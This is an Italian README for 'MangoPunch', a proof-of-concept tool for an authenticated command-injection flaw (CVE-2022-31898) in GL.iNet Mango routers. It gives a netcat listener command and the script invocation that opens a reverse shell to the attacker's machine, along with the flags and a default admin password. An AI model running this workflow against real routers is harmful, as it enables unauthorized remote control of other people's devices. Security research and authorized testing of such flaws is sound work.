
Strumento per iniezione di comandi autenticata (CVE-2022-31898) - HACKCONRD 2026.
__ __ _____ _
| \/ | | __ \ | |
| \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__
| |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \
| | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | |
|_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_|
__/ |
|___/
Questo repository contiene un Proof of Concept (PoC) tecnico per una vulnerabilità di Esecuzione Remota di Comandi (RCE) trovata su GL.iNet MT300N-V2 (Mango) e altri modelli con versioni firmware inferiori a 3.215.
Il difetto risiede nel parametro ping_addr dell'API diagnostica, consentendo a un attaccante autenticato di eseguire comandi arbitrari del sistema tramite metacaratteri shell (;).
Apri un terminale sulla tua macchina attaccante (Kali Linux) e avvia un listener Netcat:
nc -lvnp 9292
Usa il comando seguente per attivare la reverse shell:
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>
| Flag | Nome completo | Descrizione | Predefinito |
|---|---|---|---|
-R | --rhost | IP del target remoto (Router) | Richiesto |
-P | --rport | Porta di gestione web | 443 |
-L | --lhost | IP del listener (Kali/Attaccante) | Richiesto |
-l | --lport | Porta del listener | Richiesto |
-p | --pwd | Password amministratore | goodlife |
-t | --https | Abilita HTTPS | False |
Disclaimer: Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio. MangoPunch: CVE-2022-31898